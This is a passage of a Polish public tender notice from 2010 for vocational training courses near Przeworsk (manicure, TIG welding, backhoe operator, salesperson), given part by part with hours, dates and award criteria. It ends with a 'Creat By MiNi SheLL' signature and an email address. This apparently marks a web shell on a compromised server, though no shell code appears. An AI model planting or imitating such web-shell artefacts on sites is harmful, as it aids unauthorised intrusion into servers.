Miejsce szkolenia: Przeworsk lub inna miejscowość do 40 km od siedziby Zamawiającego.
Liczba osób biorących udział w kursie - 6.
Liczba certyfikatów - 6.
Liczba godzin: 120 h.
Realizacja 01.07. - 12.08.2010r.
Dodatkowe zadania Wykonawcy:
Zwrot kosztów przejazdu wszystkich uczestników kursu z: miejsce zamieszkania - miejsce szkolenia - miejsce zamieszkania wg zasad przewidzianych dla Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs przygotowania zawodowego - pielęgnacja kończyn górnych (instrument aktywizacji edukacyjnej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia musi zawierać m.in. zagadnienia z zakresu dermatologicznych schorzeń dłoni, manicure tradycyjnego i biologicznego, metod przedłużania paznokci, zdobnictwa paznokci.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: manicurzystka, modelistka.
Miejsce szkolenia: Przeworsk lub inna miejscowość do 40 km od siedziby Zamawiającego.
Liczba osób biorących udział w kursie - 5.
Liczba certyfikatów - 5.
Liczba godzin - 158 h.
Realizacja 01.07. -12.08.2010r.
Dodatkowe zadania Wykonawcy:
Zwrot kosztów przejazdu wszystkich uczestników kursu z: miejsce zamieszkania - miejsce szkolenia - miejsce zamieszkania wg zasad przewidzianych dla Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs przygotowania zawodowego - spawacz metodą TIG (instrument aktywizacji edukacyjnej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie teoretyczne i praktyczne mające na celu zdobycie przez uczestnika kursu umiejętności spawania łukowego elektrodą wolframową (metoda TIG) w zakresie wykonywania spoin pachwinowych złączy blach 
i rur oraz uzyskanie uprawnień w odpowiednim zakresie wg wymagań normy PN EN 287 -1 lub PN EN 287 - 2.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: Spawacz metodą TIG.
Miejsce szkolenia: Przeworsk lub inna miejscowość do 40 km  od siedziby Zamawiającego.
Liczba osób biorących udział w kursie - 1.
Liczba certyfikatów - 1.
Liczba godzin - 112 h.
Realizacja 01.07. -12.08.2010r.
Dodatkowe zadania Wykonawcy:
Zwrot kosztów przejazdu wszystkich uczestników kursu z: miejsce zamieszkania - miejsce szkolenia - miejsce zamieszkania wg zasad przewidzianych dla Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs przygotowania zawodowego - operator koparko-ładowarki (instrument aktywizacji edukacyjnej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia: musi zawierać m.in. zagadnienia z zakresu użytkowania eksploatacyjnego, dokumentacji technicznej, bezpieczeństwa i higieny pracy, silników spalinowych, budowy koparko - ładowarki, technologii robót, elementów hydrauliki, podstaw elektrotechniki oraz zajęcia praktyczne zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001r. Nr 118 poz. 1263).
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: operator koparko-ładowarki.
Miejsce szkolenia: Przeworsk lub inna miejscowość do 40 km od siedziby Zamawiającego.
Liczba osób biorących udział w kursie - 3.
Liczba certyfikatów - 3.
Liczba godzin - 176 h.
Realizacja: 01.09. - 30.10. 2010r.
Dodatkowe zadania Wykonawcy:  nie ma..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs przygotowania zawodowego - sprzedawca z obsługą kas fiskalnych i obsługą komputera (instrument aktywizacji edukacyjnej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia musi zawierać m.in. zagadnienia z zakresu przepisów prawnych obowiązujących 
w sprzedaży, dokumentacji księgowej, profesjonalnej obsługi klienta, techniki sprzedaży, negocjacji handlowych, marketingu sprzedaży, znaków pieniężnych, obsługi komputera z systemem operacyjnym MS Windows, edytora tekstowego MS Word, sprzedaży internetowej, arkusza kalkulacyjnego MS Excel, obsługi programów wspomagających sprzedaż, obsługi kas fiskalnych.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: sprzedawca.
Miejsce szkolenia: Przeworsk lub inna miejscowość do 40 km od siedziby Zamawiającego.
Liczba osób biorących udział w kursie: 15.
Liczba certyfikatów: 15.
Liczba godzin: 160 h.
Realizacja: 01.09. - 30.10 2010r.
Dodatkowe zadania Wykonawcy:
Zwrot kosztów przejazdu wszystkich uczestników kursu z: miejsce zamieszkania - miejsce szkolenia - miejsce zamieszkania wg zasad przewidzianych dla Programu Operacyjnego Kapitał Ludzki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com